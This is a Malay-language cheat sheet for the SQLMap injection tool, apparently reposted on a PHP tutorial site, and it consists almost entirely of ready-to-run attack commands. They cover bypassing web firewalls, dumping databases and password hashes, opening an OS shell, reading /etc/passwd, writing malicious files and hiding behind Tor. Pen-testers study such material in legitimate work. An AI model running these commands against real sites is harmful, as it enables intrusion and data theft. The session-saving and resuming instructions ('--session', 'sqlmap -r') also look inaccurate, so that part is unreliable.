cari

Rumah >pembangunan bahagian belakang >Tutorial Python >Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik

Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik

Linda Hamilton
Linda Hamiltonasal
2024-09-26 15:30:02975semak imbas

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Pengarang: Trix Cyrus

Apakah itu SQLMap?
SQLMap ialah alat ujian penembusan sumber terbuka yang digunakan untuk mengesan dan mengeksploitasi kelemahan suntikan SQL dalam aplikasi web. Ia menyokong pelbagai sistem pangkalan data seperti MySQL, PostgreSQL, Oracle, Microsoft SQL Server dan banyak lagi.

Penggunaan Asas
Untuk bermula dengan SQLMap, anda boleh menjalankannya dalam bentuk yang paling mudah dengan menyediakan URL sasaran:

sqlmap -u "http://example.com/index.php?id=1"

Arahan ini mengimbas URL sasaran untuk mencari kelemahan suntikan SQL.

1. Mengesan Kerentanan
Gunakan pilihan berikut untuk melakukan imbasan kelemahan asas dan mengesan titik suntikan SQL secara automatik:

sqlmap -u "http://example.com/index.php?id=1" --dbs

--dbs: Menyenaraikan semua pangkalan data yang tersedia pada pelayan sasaran jika kelemahan ditemui.

2. Menentukan Permintaan POST

Untuk sasaran yang memerlukan permintaan POST (biasanya dalam borang log masuk), anda boleh menentukan data seperti ini:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"

3. Memintas WAF dan Penapis

Untuk mengelak Tembok Api Aplikasi Web (WAF), SQLMap menyertakan teknik penyamaran muatan:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment

--tamper: Menggunakan skrip tamper untuk mengelak penapis. Contoh: space2comment, charencode.

4. Mengekstrak Pangkalan Data, Jadual dan Lajur
Untuk mendapatkan senarai pangkalan data pada sistem sasaran:

sqlmap -u "http://example.com/index.php?id=1" --dbs

Setelah pangkalan data dikenal pasti, ekstrak jadualnya:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

Untuk mendapatkan lajur daripada jadual tertentu:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns

5. Lambakan Data

Melambakkan kandungan jadual ialah salah satu ciri SQLMap yang paling berguna. Contohnya, untuk membuang semua data daripada jadual tertentu:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

6. Menghitung Pengguna dan Kata Laluan Pangkalan Data

SQLMap juga boleh digunakan untuk menghitung pengguna pangkalan data dan juga memecahkan kata laluan cincang:

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords

7. Mengakses Sistem Pengendalian

Dalam sesetengah kes, SQLMap boleh digunakan untuk melaksanakan arahan pada sistem pengendalian, terutamanya apabila pengguna pangkalan data mempunyai keistimewaan peringkat tinggi:

sqlmap -u "http://example.com/index.php?id=1" --os-shell

Ini akan menyediakan shell interaktif di mana anda boleh melaksanakan arahan pada sistem sasaran.

8. Muat Naik Fail dan Bacaan

Anda juga boleh membaca fail daripada sistem sasaran atau memuat naik fail berniat jahat (jika dibenarkan):

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"

9. Menggunakan Tor untuk Tanpa Nama

Untuk menyembunyikan identiti anda, anda boleh menjalankan SQLMap melalui rangkaian Tor:

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor

--tor: Mendayakan Tor.
--check-tor: Mengesahkan jika sambungan dibuat melalui Tor.

10. Menyimpan dan Menyambung Semula

SQLMap membolehkan anda menyimpan dan menyambung semula kemajuan anda dengan menggunakan pilihan --session:

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name

Kemudian, anda boleh menyambung semula sesi yang sama dengan:

sqlmap -r your_session_name

11. Mod Verbose

Untuk melihat maklumat terperinci tentang perkara yang dilakukan oleh SQLMap:

sqlmap -u "http://example.com/index.php?id=1" -v 3

Pilihan -v mengawal verbositi (tahap dari 0 hingga 6, dengan 6 menunjukkan semua butiran).

  1. Imbasan Automatik untuk Berbilang Sasaran

SQLMap menyokong mengimbas berbilang URL yang disimpan dalam fail:

sqlmap -m urls.txt --batch

--batch: Jawab semua gesaan secara automatik dengan pilihan lalai, berguna untuk pengimbasan automatik.

juga gunakan --risk=3 dan --level=5 untuk memajukan pengimbasan
Anda boleh menggunakan helaian cheat ini untuk memperkenalkan pembaca kepada arahan penting SQLMap dan membantu mereka bermula dengan ujian suntikan SQL.

~TrixSec

Atas ialah kandungan terperinci Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

batch sql mysql if for require Session using default this table oracle database postgresql microsoft
Kenyataan:
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Artikel sebelumnya:Mengendalikan DatePicker dalam FletArtikel seterusnya:Mengendalikan DatePicker dalam Flet

Artikel berkaitan

Lihat lagi